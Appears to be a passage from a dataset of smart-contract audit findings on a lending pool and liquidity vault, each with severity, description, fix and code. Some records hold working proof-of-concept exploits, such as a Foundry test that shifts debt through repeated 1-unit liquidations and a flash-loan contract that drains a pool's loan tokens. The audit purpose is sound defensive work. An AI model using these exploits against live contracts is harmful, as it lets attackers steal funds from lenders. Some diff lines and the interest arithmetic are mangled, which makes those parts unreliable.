uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owe 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). 
In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = 
pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\nчWe need to double check this edge case and not allow the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, \"Pool: borrower not liquidatable\");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint 
userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\nчA liquidator can gain not only collateral, but also can reduce his own debt. 
Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.ч```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n 
assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n -Users can borrow all loan tokensчmediumчUtilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. 
Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Pool.sol\";\\nimport \"../src/Factory.sol\";\\nimport \"./mocks/Borrower.sol\";\\nimport \"./mocks/ERC20.sol\";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory 
factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), \"G\");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\nчA possible solution would be adding a 
locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.чThe vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n 
(uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n -Fee share calculation is incorrectчmediumчFees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares to the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accruedFeeShares = fee * _totalSupply / _supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accruedFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.чUse the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. 
Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\nчFee recipient is given more fees than intended, which results in less interest for LPsч```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n -fund loss because calculated Interest would be 0 in getCurrentState() due to division errorчmediumчfunction `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. 
Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 seconds. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e6 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interaction and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.чdon't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.чborrowers won't pay any interest and lenders would lose funds.ч```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. 
Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n -cachedUserRewards variable is never reset, so user can steal all rewardsчhighчcachedUserRewards variable is never reset, so user can steal all rewards\\nWhen user wants to withdraw then `_withdrawUpdateRewardState` function is called. This function updates internal reward state and claims rewards for user if he provided `true` as `claim_` param.\\n```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n\\nWhen user calls claimRewards, then `cachedUserRewards` variable is added to the rewards he should receive. The problem is that `cachedUserRewards` variable is never reset to 0, once user claimed that amount.\\nBecause of that he can claim multiple times in order to receive all balance of token.чOnce user received rewards, reset `cachedUserRewards` variable to 0. 
This can be done inside `_claimInternalRewards` function.чUser can steal all rewardsч```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n -User can receive more rewards through a mistake in the withdrawal logicчhighчIn the `withdraw()` function of the SingleSidedLiquidityVault the contract updates the reward state. Because of a mistake in the calculation, the user is assigned more rewards than they're supposed to.\\nWhen a user withdraws their funds, the `_withdrawUpdateRewardState()` function checks how many rewards those LP shares generated. If that amount is higher than the actual amount of reward tokens that the user claimed, the difference between those values is cached and the amount the user claimed is set to 0. That way they receive the remaining shares the next time they claim.\\nBut, the contract resets the number of reward tokens the user claimed before it computes the difference. 
That way, the full amount of reward tokens the LP shares generated are added to the cache.\\nHere's an example:\\nAlice deposits funds and receives 1e18 shares\\nAlice receives 1e17 rewards and claims those funds immediately\\nTime passes and Alice earns 5e17 more reward tokens\\nInstead of claiming those tokens, Alice withdraws 5e17 (50% of her shares) That executes `_withdrawUpdateRewardState()` with `lpAmount_ = 5e17` and claim = false:\\n```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 
reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\nчFirst calculate `cachedUserRewards` then reset `userRewardDebts`.чA user can receive more reward tokens than they should by abusing the withdrawal system.ч```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be 
distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -Vault can experience long downtime periodsчmediumчThe chainlink price could stay up to 24 hours (heartbeat period) outside the boundaries defined by `THRESHOLD` but within the chainlink deviation threshold. Deposits and withdrawals will not be possible during this period of time.\\nThe `_isPoolSafe()` function checks if the balancer pool spot price is within the boundaries defined by `THRESHOLD` respect to the last fetched chainlink price.\\nSince in `_valueCollateral()` the `updateThreshold` should be 24 hours (as in the tests), then the OHM derived oracle price could stay at up to 2% from the on-chain trusted price. The value is 2% because in WstethLiquidityVault.sol#L223:\\n```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n\\n`stethPerWsteth` is mostly stable and changes in `stethUsd` and `ethUsd` will cancel out, so the return value changes will be close to changes in `ohmEth`, so up to 2% from the on-chain trusted price.\\nIf `THRESHOLD` < 2%, say 1% as in the tests, then the Chainlink price can deviate by more than 1% from the pool spot price and less than 2% from the on-chain trusted price fro up to 24 h. 
During this period withdrawals and deposits will revert.чIssue Vault can experience long downtime periods\\n`THRESHOLD` is not fixed and can be changed by the admin, meaning that it can take different values over time. Only a tight range of values around 2% should be allowed to avoid the scenario above.чWithdrawals and deposits can often be unavailable for several hours.ч```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n -SingleSidedLiquidityVault.withdraw will decrease ohmMinted, which will make the calculation involving ohmMinted incorrectчmediumчSingleSidedLiquidityVault.withdraw will decrease ohmMinted, which will make the calculation involving ohmMinted incorrect.\\nIn SingleSidedLiquidityVault, ohmMinted indicates the number of ohm minted in the contract, and ohmRemoved indicates the number of ohm burned in the contract. So the contract just needs to increase ohmMinted in deposit() and increase ohmRemoved in withdraw(). But withdraw() decreases ohmMinted, which makes the calculation involving ohmMinted incorrect.\\n```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? 
ohmReceived - ohmMinted : 0;\\n```\\n\\nConsider that a user minted 100 ohm in deposit() and immediately burned 100 ohm in withdraw().\\nIn _canDeposit, the amount_ is less than LIMIT + 1000 instead of LIMIT\\n```\\n function _canDeposit(uint256 amount_) internal view virtual returns (bool) {\\n if (amount_ + ohmMinted > LIMIT + ohmRemoved) revert LiquidityVault_LimitViolation();\\n return true;\\n }\\n```\\n\\ngetOhmEmissions() returns 1000 instead of 0\\n```\\n function getOhmEmissions() external view returns (uint256 emitted, uint256 removed) {\\n uint256 currentPoolOhmShare = _getPoolOhmShare();\\n\\n if (ohmMinted > currentPoolOhmShare + ohmRemoved)\\n emitted = ohmMinted - currentPoolOhmShare - ohmRemoved;\\n else removed = currentPoolOhmShare + ohmRemoved - ohmMinted;\\n }\\n```\\nчIssue SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect\\n```\\n function withdraw(\\n uint256 lpAmount_,\\n uint256[] calldata minTokenAmounts_,\\n bool claim_\\n ) external onlyWhileActive nonReentrant returns (uint256) {\\n // Liquidity vaults should always be built around a two token pool so we can assume\\n // the array will always have two elements\\n if (lpAmount_ == 0 || minTokenAmounts_[0] == 0 || minTokenAmounts_[1] == 0)\\n revert LiquidityVault_InvalidParams();\\n if (!_isPoolSafe()) revert LiquidityVault_PoolImbalanced();\\n\\n _withdrawUpdateRewardState(lpAmount_, claim_);\\n\\n totalLP // Remove the line below\\n= lpAmount_;\\n lpPositions[msg.sender] // Remove the line below\\n= lpAmount_;\\n\\n // Withdraw OHM and pairToken from LP\\n (uint256 ohmReceived, uint256 pairTokenReceived) = 